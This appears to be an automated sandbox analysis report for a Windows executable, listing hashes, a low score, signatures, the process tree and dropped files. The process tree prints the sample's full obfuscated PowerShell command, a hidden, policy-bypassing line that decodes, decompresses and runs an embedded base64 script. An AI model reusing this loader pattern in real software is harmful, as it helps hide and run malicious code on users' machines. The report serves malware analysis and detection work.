dd6e2033cd45addc571cbb7eba7c6ad3b80e172f26f29256d6f2aacf94eaf4d8

Analysis

max time kernel
148s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
21/04/2024, 05:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe
Size

90KB
MD5

fe874a810919c2453e9723f6716a46f4
SHA1

9119d485911ea46515ac4e46d35599b1e16b918f
SHA256

dd6e2033cd45addc571cbb7eba7c6ad3b80e172f26f29256d6f2aacf94eaf4d8
SHA512

53abeb877a9a3ad139056b667ad16a9d12b97b7bae31440a44a5c27d030ef3f23bd66740cbd50fc184dcb84bb1ed4c926b3a2911f1bb8441a53e045d08feb98f
SSDEEP

1536:IM7ftfkS5g9YOms+gZcQipICdXkNDqLLZX9lItVGL++eIOlnToIfMwM5HOB:ICFfHgTWmCRkGbKGLeNTBfMI

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
3116	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3116	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 4776 wrote to memory of 1356	4776	fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe	87
PID 4776 wrote to memory of 1356	4776	fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe	87
PID 1356 wrote to memory of 3116	1356	cmd.exe	88
PID 1356 wrote to memory of 3116	1356	cmd.exe	88
PID 1356 wrote to memory of 3116	1356	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4776
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\377B.tmp\377C.tmp\377D.bat C:\Users\Admin\AppData\Local\Temp\fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1356
- - C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe
    C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -EncodedCommand -ExecutionPolicy -Noninteractive -NoProfile -W Hidden Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"zVZtb9pIEP7OrxhZe6rdYMcESpNYSE1J03ItaS6QpHcIVYu9wDbrXWe9TqCU/35jbN7SL1U/nE5I2Lue2Xl75pklD9CCN1ZlcC5EJ06UNrZ1z7Rkon7kRUJYzhCSbCR4CKmhBh9sZvA7dKS5MhpuuTYZFWdCqNAu90RyFkWapWkVMi4NRE89/p2Vi3Ehi0cp2Z8n2+0rrQwLjRP8ti9tzahh/Sk+oq0vxfrMGM1HmWE7Thka3heebYRxT5uN95vtK6ppzNDWRnllC0O4EHSyK1lY60QYhvWmwse2/Z4Z967b+Tz6htGB2xY0TeGOy/rRVww5RENKO95lFo+Y/jz+pCY8pGLzJQV3wqDmwKIyeDs3bDAcksv+VV9TmcbctKq1l43jYHdr4A9b/qz2NtjIpyxUMnqusr+70SJSnYW57RYZU5GyoK/nC9JT4T0zrUv25JaBXDLjFbtp+bQHu3tlEi9ozMV8eHqKGWIaBZ6Uvq8OftbOsYBi5xPM9P73HBgqVKKUuIkSJygd8tpKSvTGfpGlXqKU8KRJPKUnL6q1o7oTDG4Vj4Zr4R6Tkb2bqucC1yxk/JHtyywRq+F0sZMXozO2DIjOZF8ZKlp+cKH0OxpObdKREZsBl7BXkYbveY360FlsdTZvL49eNQ8KPTxzzHVq+jxmLXsn1+c5rHHTrp34frWGP3/1G6w/fOQyylNjQsfJM9/lQvCiwKk9uMHcNxtDe2uz5vs+SvZWEsEK9G5PMJaAm0KtXtQcHcjz8j8qeunRL1Z9LV2UfR/uPwltSv9cbmtUqJTZvwuHZ932q4hABgH7v4MCuLCFYME8dXCVhk24ORGZHB0Rzg3r7G37/N3F+w+dPz9+6l5+vvrrute/ub378vc/dBRGbDyZ8m/3IpYqecBDs8en2fy7jzVqvGq+Pj6xvL5qT6k+05rObacyzmSYcyqENnl0FqCZyZDdbXuAnItEBuRxXwN+QJfRNNNsnR63l8UYTBbDH4B05vvgsgc4OXKW29MNLMg4994Kap5X/zFWSNnh1FWrI/DbQQtINLAnSNxYr0jF4MZ0xmM8lUTeJyYnZuoMl0HpHxkHO6czWEBSsDcsBjR3dEhmaA7/DoB8XQaAeEQXZug9Erwp7cLClljmcnG9sut4EiccYm65Y2CyAPQYbMIRaYSDKww0G/h2cIBwmqIlE5D73GCEFlgAUAaIKmKFxXuUS3OBae6RCCAHGeY8dbC666yjBJotF9bJ45cbC8MsepTpRx6yK4Vl6VJJJ0wj4vJdpttMGz7GEWbYLRU8Wg3JNhVihMMWbS7W7RLjYgfXvXlqWOzlx9+xUVtwJk1QIbH3Accp0ytqsa0sZdpFe9JYVbC66juCmx42PB/9V3GCxkYCI+72Ou+g6dWCfM5G6imFy75jYS9LNDoJYD0ZgSR5GmLvXD1JoWiETURta2pMkp4eHtZeH3k1PKZ57NXq/umxf+wfEmmBUyEK9dAjN6cnRAfLh/c5G3PJVzUiD+Be4o0BrNWgt8CVuEoTGrJi9F+U1cTxnuB9wEx1ViGzFlGnp3s3Kr9KkhJxVX9Wx17FR8NH+ioTdp1Jg73qrZhWJWVpUq9LdTqlAuvSVsncJkkV/CoMinsK9v8MOwkX9SPbcaqwMZKHhiq7F6mcXcisoJm841RmXJkJhM3e3CgJ5LjZ8P2SI5f/Ag==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3116

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\377B.tmp\377C.tmp\377D.bat

Filesize
2KB

MD5
5f09183586480dccf9fece371e9e7658

SHA1
6ec0e7ffe68a2903720fb759d303ef9353156fdf

SHA256
be59bce0a84c42b1387aa2d4aedac1a08a84a90cba9333b0f5e9c632e998a605

SHA512
cb04862075f911a4bb156bd172f733da0b18f2ee5043ecf50cfc46cdc0a921b8bfe64fedfffc08a5fdf5246087a89e74598d8cfe1448bd79d8078ca18576cdbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1kkbgpdi.2ac.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3116-3-0x00000000742A0000-0x0000000074A50000-memory.dmp

Filesize
7.7MB

Download
memory/3116-2-0x0000000005320000-0x0000000005356000-memory.dmp

Filesize
216KB

Download
memory/3116-5-0x00000000054B0000-0x00000000054C0000-memory.dmp

Filesize
64KB

Download
memory/3116-4-0x00000000054B0000-0x00000000054C0000-memory.dmp

Filesize
64KB

Download
memory/3116-6-0x0000000005AF0000-0x0000000006118000-memory.dmp

Filesize
6.2MB

Download
memory/3116-7-0x0000000005A30000-0x0000000005A52000-memory.dmp

Filesize
136KB

Download
memory/3116-8-0x0000000006120000-0x0000000006186000-memory.dmp

Filesize
408KB

Download
memory/3116-9-0x0000000006200000-0x0000000006266000-memory.dmp

Filesize
408KB

Download
memory/3116-19-0x00000000062F0000-0x0000000006644000-memory.dmp

Filesize
3.3MB

Download
memory/3116-22-0x00000000742A0000-0x0000000074A50000-memory.dmp

Filesize
7.7MB

Download